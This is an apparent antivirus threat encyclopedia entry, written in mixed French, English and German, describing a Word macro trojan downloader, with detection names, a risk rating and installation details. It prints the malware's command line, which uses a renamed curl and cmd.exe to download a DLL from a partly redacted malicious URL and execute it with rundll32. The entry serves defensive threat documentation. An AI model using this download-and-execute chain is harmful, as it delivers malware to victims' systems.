Trojan.W97M.BITSLODR.POL
Publish Date: 17 mars 2020
TrojanDownloader:O97M/Powdow.ARJ!MTB (Microsoft); VBA/TrojanDownloader.Agent.RZD trojan (NOD32)
Plate-forme:
Windows
Overall Risk:
Dommages potentiels: :
Distribution potentielle: :
reportedInfection:
Information Exposure Rating::
Faible
Medium
Élevé
Critique
Type de grayware:
Trojan
Destructif:
Non
Chiffrement:
In the wild::
Oui
Overview
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Détails techniques
File size: 93,441 bytes
Memory resident: Non
Date de réception des premiers échantillons: 13 mars 2020
Übertragungsdetails
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
Schleust die folgenden Dateien ein:
- %Temp%\curl.com
Fügt die folgenden Prozesse hinzu:
- "%System%\cmd.exe" /c %Temp%\curl.com /transfer jobname http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab %Temp%\12345.dll&& rundll32 %Temp%\12345.dll,DllRegisterServer
Andere Details
It connects to the following possibly malicious URL:
- http://{BLOCKED}tdriold.com/f64bj/jtrhs.php?l=ghs3.cab